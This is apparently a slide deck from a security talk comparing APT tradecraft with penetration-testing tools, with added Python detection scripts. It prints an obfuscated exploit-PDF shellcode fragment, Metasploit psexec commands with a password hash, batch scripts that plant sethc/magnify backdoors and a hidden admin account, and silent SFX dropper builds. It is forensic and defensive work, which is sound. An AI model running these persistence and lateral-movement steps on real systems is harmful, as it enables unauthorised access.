Evolution of PenTesting - CounterMeasure 2019…

Post on 13-Jun-2020

Evolution of PenTesting

Introduction

• Name: Russ Gideon

• Title: Director of Malware Research

• Contact: [email protected]

• Twitter: @gideonsecurity

• Background:

– Led numerous Red Teams

– Foreign attack profiling and reverse engineering

– Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing

Evolution

• What is this talk?

– A dissection of real world attacks and some of its effects on penetration testing.

– Reflection on real offensive operators vs penetration testers

– Conclusions are derived mainly from a forensics/binary analysis perspective

• What this talk is not!

– A slam on current penetration testing tools!

Evolution

• 1960s discussions about Time Sharing computers being vulnerable

– RAND Corporation

– NSA

• Coined the term “penetration” for this

• Evolved into Tiger Teams

• From a historical perspective influential people in this

– Willis Ware

The Birth Of an Industry

Industry realized we need to behave like attackers to learn how to defend against them

Henceforth the industry we all know and love is born

Evolution Of an Industry

• Industry gets bigger

• Tools become a commodity

• Attackers evolved and changed tactics

– Employed varying degrees of malware

– Deception

– Leverage protocol and design flaws

– Evasion and anti-analysis techniques

• The industry tools also evolved, but not in the same manner

Memory corruption == $$$

• Tools become commodity

• The shift begins

• Attackers are closed source and don’t release

We Make Strange Bedfellows

Offensive Operators

Why do we call it APT?

• “APT” != Advanced

• Clever != Advanced

• Attackers work as hard as they have to but not any harder

– As we step up the defense game they have to work harder

– Currently that game is not too difficult (in most places)

Outline

• Getting In

• APT Lateral Movement vs Pentesters Lateral Movement

• Staging The Attack

Getting In – Spear Phishing

Getting In

• Example

– CVE-2010-2883

• Stack-based buffer overflow in CoolType.dll

• Very popular for targeted spear phishing

• 22 unique samples with this exploit in them

– 7 of these samples are made with Metasploit’s module for this

– Case study

• Targeted Attack With a PDF

– D4169301AFBC86A04135EBC4A6A4BADB.pdf

Getting In

• Metasploit has a great module for 2010-2883

• If a host isn’t vulnerable then it will drop and open a clean “Hello World” PDF

Getting In

• D4169301AFBC86A04135EBC4A6A4BADB.pdf

• Includes this data stream

• Look familiar?

Getting In

• The shellcode is the only significant difference between the “APT” sample and a general Metasploit created PDF

Getting In

    WjozzFaiSj = unescape
    var nXzaRHPbywaqAbGpGx0t0zGkvQWhu =
    "\x25\x754141\x25\x754141%63a5%u4a80\0x25 snip….. 0x75fa65%uec10%u0937%ufb0c%ufd97…….snip …%ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uaef2"
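The obfuscation visible in this fragment writes "%u" as the JavaScript escapes "\x25\x75", so a scanner that counts literal %uXXXX tokens sees almost nothing until the string escapes are resolved. The Python below is an added example for analysts, not code from the talk; the function names, the threshold and the sample string (built only from tokens visible on the slide) are assumptions.

```python
import re

# JavaScript string escapes that can hide characters inside a literal.
JS_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
# One 16-bit unit as consumed by unescape(), e.g. %u4141.
PCT_U = re.compile(r"%u([0-9A-Fa-f]{4})")


def resolve_js_escapes(literal: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes the way the JS parser would."""
    return JS_ESCAPE.sub(
        lambda m: chr(int(m.group(1) or m.group(2), 16)), literal
    )


def pct_u_tokens(text: str) -> list:
    """Return the hex digits of every %uXXXX token in the text."""
    return PCT_U.findall(text)


def decode_pct_u(text: str) -> bytes:
    """Bytes as laid out in memory: each %uXXXX is one little-endian word."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in pct_u_tokens(text))


def analyse(literal: str, min_tokens: int = 3) -> dict:
    """Compare token counts before and after escape resolution."""
    normalised = resolve_js_escapes(literal)
    raw_n = len(pct_u_tokens(literal))
    norm_n = len(pct_u_tokens(normalised))
    return {
        "normalised": normalised,
        "raw_tokens": raw_n,
        "normalised_tokens": norm_n,
        # True when string escapes concealed %u tokens from a naive scan.
        "escapes_hid_tokens": norm_n > raw_n,
        # Assumed threshold: flag literals carrying a run of encoded words.
        "flag": norm_n >= min_tokens,
        "payload": decode_pct_u(normalised),
    }


# Constructed sample, assembled from tokens that appear on the slide.
SAMPLE = r"\x25\x754141\x25\x754141%u4a80"

if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(result["normalised"])
    print(result["raw_tokens"], "->", result["normalised_tokens"])
    print(result["payload"].hex())
```

Running the same signature over both the raw and the normalised literal, and alerting when the counts differ, catches the escape layer itself regardless of what the decoded bytes are.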

Using MSF DEP/ASLR Bypass

MSF Created PDF              APT Created PDF with MSF

seg000:00000136 db 84h       seg000:00000136 db 84h
seg000:00000137 db 4Ah ;     seg000:00000137 db 4Ah ;
seg000:00000138 db 92h ;     seg000:00000138 db 92h ;
seg000:00000139 db 0B6h      seg000:00000139 db 0B6h
seg000:0000013A db 80h ;     seg000:0000013A db 80h ;
seg000:0000013B db 4Ah       seg000:0000013B db 4Ah
seg000:0000013C db 0FFh      seg000:0000013C db 0FFh
seg000:0000013D db 0FFh      seg000:0000013D db 0FFh
seg000:0000013E db 0FFh      seg000:0000013E db 0FFh
seg000:0000013F db 0FFh      seg000:0000013F db 0FFh
seg000:00000140 db 0FFh      seg000:00000140 db 0FFh
seg000:00000141 db 0FFh      seg000:00000141 db 0FFh
seg000:00000142 db 0FFh      seg000:00000142 db 0FFh
seg000:00000143 db 0FFh      seg000:00000143 db 0FFh
seg000:00000144 db 0FFh      seg000:00000144 db 0FFh
seg000:00000145 db 0FFh      seg000:00000145 db 0FFh
seg000:00000146 db 0FFh      seg000:00000146 db 0FFh
seg000:00000147 db 0FFh      seg000:00000147 db 0FFh
seg000:00000148 db 0         seg000:00000148 db 0
seg000:00000149 db 10h       seg000:00000149 db 10h
seg000:0000014A db 0         seg000:0000014A db 0
seg000:0000014B db 0         seg000:0000014B db 0

Side Note

• The original sample from contagio

– Dropper is igfxver.exe

– AV family of Chifrax

• D4169301AFBC86A04135EBC4A6A4BADB.pdf

– Dropper is AcroRd32.exe in temp

– %TEMP%\AcroRd32.exe drops and starts

• rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11

– AV Family of Protux

– Delivered ~2 weeks later

Getting In Conclusion

• Pen Tester: SingTable CoolType DLL Overflow MSF Module with PDF dropper.

– Not a white hat based disclosure

– Originally found in a targeted campaign

• http://contagiodump.blogspot.com/search/label/CVE-2010-2883

• Attacker: Rip off MSF Module

– This attack used the Metasploit module

– Change out shellcode

• Added obfuscation

• Verdict: Attacker rips off another attacker’s tactic and makes it better

Outline

• Getting In

• APT Lateral Movement vs Pen Testers Lateral Movement

• Staging The Attack

Lateral Movement

APT Lateral Movement

• Case Study: a1765a7f3376c76d8c23766a92f1cb6b.exe

– Nps.exe

• Sample from IR we conducted

• In a nutshell their own PSEXEC for shoveling shells

Lateral Movement

• General flow of the sample

– From controlling node

• Execute: nps.exe -install $Victim NPServer

• Drops nps.exe on \\victim\Admin$\system32

• Creates a service around nps.exe (named NPServer) on remote server and starts it

• Named pipes created on victim host and used for communications

– NPStdin

– NPStdout

Lateral Movement

• Based upon arguments it is a service binary or drops the communication piece on the remote host

Lateral Movement

• Dropper to the victim

Lateral Movement

• Remote Named pipes for all communications

Controlling host

Victim Host

Lateral Movement

• Taking advantage of credential authorization

• Of course won’t work in all situations

– Account needs to have administrative privileges

– Vista and up

• Credentials have to be domain based

• Local administrative credentials can’t write to C$ and Admin$

Forensic Evidence

Forensic Evidence

Pen Testers Forensic Evidence

• Metasploit has the same capability with PSEXEC

• General flow

– Pushes service executable with payload to \\victim\Admin$\system32

– Uses DCERPC to create a service around the service binary on victim host

– Starts the service on the victim

– Uses payload defined variables for communication

Pen Testers Forensic Evidence

Pen Testers Forensic Evidence

Usage

Usage

• msf exploit(psexec) > show options

    Module options (exploit/windows/smb/psexec):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       RHOST                       yes       The target address
       RPORT      445              yes       Set the SMB service port
       SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
       SMBPass                     no        The password for the specified username
       SMBUser                     no        The username to authenticate as

Major Differences!

• NPS.exe usage screen. Shows flexibility to alter your forensic evidence

• Metasploit doesn’t have this capability

• Derives its service name and display name from 2 pieces of code in the module

– Service name generation looks like

• servicename = rand_text_alpha(8)

– Display name generation looks like:

• displayname = 'M' + rand_text_alpha(rand(32)+1)

Major Differences

• Not Blending in!

– rand_text_alpha(8)

– 'M' + rand_text_alpha(rand(32)+1)

Lateral Movement Solution

• A few lines added to the psexec module and we have some flexibility now

– Register two new options

• SVCName

– The Service name you want to use. This will be what is left over in the registry under HKLM\CurrentControlSet\services if the service is not cleaned up

• DisplayName

– This is the display name of the service that will show up in the event logs

Lateral Movement Solution

• psexec_ar options

    msf exploit(psexec_ar) > set DisplayName NPServer
    msf exploit(psexec_ar) > set RHOST victim
    msf exploit(psexec_ar) > set SMBDomain ""
    msf exploit(psexec_ar) > set SMBUser Administrator
    msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586
    msf exploit(psexec_ar) > set SVCName NPServer
    msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe
    msf exploit(psexec_ar) > set EXE::Custom mycustom.exe
    msf exploit(psexec_ar) > exploit

Lateral Movement Solution

Lateral Movement Solution

Available on GitHub

https://github.com/AttackResearch/Metasploit/blob/master/modules/exploits/psexec_ar.rb

Lateral Movement Conclusion

• Pen Tester: MSF Psexec module

– Randomized service names

– Obvious “badness”

– Very loud

• Attacker: Custom psexec type functionality

– Blend in and look normal

– Uses named pipes for communication

– Very basic backdoor that still isn't caught by AV

• Verdict: Superior attacker technique, less likely to get caught
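For the defender, the two naming schemes quoted earlier (rand_text_alpha(8) and 'M' + rand_text_alpha(rand(32)+1)) are easy to match, while a chosen name such as NPServer is not, so the added Python example below pairs the pattern check with a fleet baseline; the baseline step goes beyond what the slides describe. It is not code from the talk: the record fields, host names, random-looking names and inventory are constructed, and only NPServer comes from the slides.

```python
import re
from collections import Counter

# Name shapes produced by the stock module, as quoted on the slides:
#   servicename = rand_text_alpha(8)
#   displayname = 'M' + rand_text_alpha(rand(32)+1)
STOCK_SERVICE = re.compile(r"^[A-Za-z]{8}$")
STOCK_DISPLAY = re.compile(r"^M[A-Za-z]{1,32}$")


def matches_stock_pattern(rec: dict) -> bool:
    """True only when BOTH names fit; 'Netlogon' alone is also 8 letters."""
    return bool(STOCK_SERVICE.match(rec["service_name"])
                and STOCK_DISPLAY.match(rec["display_name"]))


def build_baseline(inventory: dict, min_hosts: int = 2) -> set:
    """Service names (lower-cased) seen on at least min_hosts machines."""
    counts = Counter(
        name.lower() for names in inventory.values() for name in set(names)
    )
    return {name for name, n in counts.items() if n >= min_hosts}


def triage(new_services: list, baseline: set) -> list:
    """Return (host, service_name, reasons) for every suspicious record."""
    findings = []
    for rec in new_services:
        reasons = []
        if matches_stock_pattern(rec):
            reasons.append("stock-random-names")
        if rec["service_name"].lower() not in baseline:
            reasons.append("not-in-baseline")
        if reasons:
            findings.append((rec["host"], rec["service_name"], reasons))
    return findings


# Constructed inventory taken before the incident (hypothetical hosts).
INVENTORY = {
    "ws01": ["Spooler", "Netlogon", "W32Time"],
    "ws02": ["Spooler", "Netlogon", "W32Time"],
    "ws03": ["Spooler", "Netlogon", "W32Time", "VendorAgent"],
}

# Constructed newly installed services; NPServer is the name from the slides.
NEW_SERVICES = [
    {"host": "ws01", "service_name": "Netlogon", "display_name": "Netlogon"},
    {"host": "ws02", "service_name": "qKzRtWpL", "display_name": "MhTqZxWvbn"},
    {"host": "ws03", "service_name": "NPServer", "display_name": "NPServer"},
]

if __name__ == "__main__":
    for finding in triage(NEW_SERVICES, build_baseline(INVENTORY)):
        print(finding)
```

The pattern rule alone reports only the randomly named service; the blended-in NPServer entry surfaces solely through the baseline comparison.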

Outline

• Getting In

• APT Lateral Movement vs Pen Testers Lateral Movement

• Staging The Attack

Staging The Attack

Staging The Attack

• Automation is the key

• Humans make mistakes

• Automate the post exploitation

– Sounds “advanced” doesn’t it?

Why Raise The Bar?

• Found on various C2 hosts and on the victims

– MM.exe

• Simple automation of their attack

– Helps them for speed

– Helps us with being able to know how they will operate in environments next time

• Rar files aren’t just for exfiltration

Why Raise The Bar?

• Dissection of mm.exe

– Self executing rar file

– Drops 2.bat and mm.exe in C:\Temp

– C:\Temp\mm.exe isn’t the same as the original mm.exe

• New mm.exe

• Another UPX packed SFX

– Drops 22.bat and net1.exe in C:\Temp

Why Raise The Bar?

• 2.bat

    copy %windir%\explorer.exe %windir%\system32\explorer1.exe
    copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
    copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
    copy c:\temp\mm.exe %windir%\system32\magnify1.exe
    del %windir%\system32\sethc.exe
    del %windir%\system32\magnify.exe
    c:
    cd %windir%\system32\
    ren explorer1.exe sethc.exe
    ren magnify1.exe magnify.exe

Why Raise The Bar?

• 22.bat

    c:\temp\net1.exe user syslem$ /active:y
    c:\temp\net1.exe user SYSLEM$ qazwsx!@#123
    c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add
    c:\temp\net1.exe localgroup Administrators syslem$ /add

• Now they have

– Persistence

– Communications
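Both batch files leave recognisable command lines behind, which gives responders something to hunt for in recovered scripts or command-line logging. The Python below is an added triage example, not code from the talk: the tag names and rule set are assumptions, the accessibility binaries other than sethc.exe and magnify.exe are added here, and the sample lines are the slides' commands with the password replaced by a placeholder.

```python
import re

# Binaries launchable from the logon screen. The slides show sethc.exe and
# magnify.exe being replaced; the other names are an added assumption.
ACCESSIBILITY = ("sethc", "magnify", "utilman", "osk", "narrator")
ACCESS_RE = re.compile(
    r"(?:^|[\\\s])(?:%s)\.exe(?=\s|$)" % "|".join(ACCESSIBILITY), re.I
)
FILE_OP_RE = re.compile(r"^\s*(copy|del|erase|ren|rename|move)\s", re.I)
# net / net1, optionally with a directory prefix and .exe suffix.
NET_RE = re.compile(
    r"^\s*(?P<dir>(?:\S*[\\/])?)net1?(?:\.exe)?\s+(?P<args>.+)$", re.I
)
ADD_DOLLAR_RE = re.compile(r"^user\s+\S*\$\s.*/add\b", re.I)
ADMIN_ADD_RE = re.compile(r"^localgroup\s+administrators\s+\S+\s+/add\b", re.I)


def classify(line: str) -> set:
    """Return the set of finding tags for one script or command line."""
    tags = set()
    if FILE_OP_RE.match(line) and ACCESS_RE.search(line):
        tags.add("accessibility-binary-file-op")
    net = NET_RE.match(line)
    if net:
        directory = net.group("dir").lower().rstrip("\\/")
        if directory and not directory.endswith("system32"):
            tags.add("net-tool-outside-system32")  # e.g. a copy in C:\Temp
        if ADD_DOLLAR_RE.match(net.group("args")):
            tags.add("account-add-dollar-suffix")  # user name ending in '$'
        if ADMIN_ADD_RE.match(net.group("args")):
            tags.add("local-admin-add")
    return tags


def scan(lines: list) -> dict:
    """Map 1-based line numbers to tags, skipping lines with no finding."""
    tagged = ((i, classify(line)) for i, line in enumerate(lines, 1))
    return {i: tags for i, tags in tagged if tags}


# Lines from 2.bat and 22.bat as shown on the slides (password replaced),
# plus one constructed benign line at the end.
SAMPLE = r"""copy %windir%\explorer.exe %windir%\system32\explorer1.exe
copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
copy c:\temp\mm.exe %windir%\system32\magnify1.exe
del %windir%\system32\sethc.exe
del %windir%\system32\magnify.exe
ren explorer1.exe sethc.exe
ren magnify1.exe magnify.exe
c:\temp\net1.exe user syslem$ /active:y
c:\temp\net1.exe user SYSLEM$ <password> /add
c:\temp\net1.exe localgroup Administrators syslem$ /add
net user""".splitlines()

if __name__ == "__main__":
    for number, tags in scan(SAMPLE).items():
        print(number, sorted(tags))
```

Lines 1 and 4 stage files under temporary names and pass these rules, so a file-integrity check on the accessibility binaries themselves remains a useful companion control.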

Before and After

Why Raise The Bar?

• Build the SFX RAR file

– Rar.exe a -sfxDefault.sfx -zsettings.conf mm2.exe mm.exe 2.bat

– Settings.conf

    ;The comment below contains SFX script commands
    Path=C:\Temp\
    SavePath
    Overwrite=1
    Silent=1
    Setup=2.bat

Why Raise The Bar?

• Build the SFX RAR file

– Rar.exe a -sfxDefault.sfx -zsettings1.conf mm.exe C:\Windows\System32\net1.exe 22.bat

– Settings1.conf

    ;The comment below contains SFX script commands
    Path=C:\Temp\
    SavePath
    Overwrite=1
    Silent=1
    Setup=22.bat

Staging The Attack Conclusion

• Pen Tester: Possible MSF Module

– There really isn’t a tool comparison

– Make a metasploit module for this?

– Working harder than have to?

• Attacker: Attack Process is Automated

– No need for a complex framework

– Works into attackers tool set

– Leverage system resources and that is it

• Verdict: Attacker technique is simple and effective. Doesn’t work harder than has to

Conclusions

• Every attack (and group/person) has its characteristics as do pen testers

• The objectives of a pen tester are usually much different than a nation state operator or black hat

– Pen tests have a ton of constraints

– Pen testers are there to test for vulnerabilities

• Which is needed

– This is not testing the system as a whole

• How does your system react to a true compromise

Conclusions

• Testing the system as a whole

– Targeted attacks affect the whole system

– Penetration testing really just looks for vulnerabilities

• We have corrupted the term “penetration tests”

– Pen Test = 20K cheap scan and assessment

• Attack Modeling and Simulations aren’t the same as our current definition of penetration tests

Attack Simulations and Modeling

• Testing the system as a whole:

– Monitoring

– Triage process

– Incident Response process

• Your operations and your vendors

– Business con-ops

– Disaster recovery

• If you pull the plug on your network you are in disaster recovery!

Attack Simulations: Case Study

Attack Simulations

• What’s the difference between a fire inspector and a fireman?

• Fire inspectors are hired to => Inspect

– Exit lights are working

– Fire alarms are working

– Fire extinguishers are up to par

• Firemen are hired to => Respond

– Fires

– Medical emergencies

– Large scale disasters

Attack Simulations

• Do not have your incident response capability behave as fire inspectors

• They are needed to respond not inspect

• We must start training the IR capability

– More than just penetration testing of them

• What are firemen doing while they are “down”?

– Training

• Is your IR team technically capable of handling an incident

– Reverse Engineering

– PCAP Analysis

– Log mining

• Does the business know how to use them

Attack Simulations

• You might not be ready for a full stress test of your environment

• Engage someone that has done this work and see what they can do.

• More than likely there is a lot they can do with and for you

– Testing your NOC/IR Ops

– Testing your detection tools/capabilities

– Modeling attacker workflows and how it relates to your data

Questions?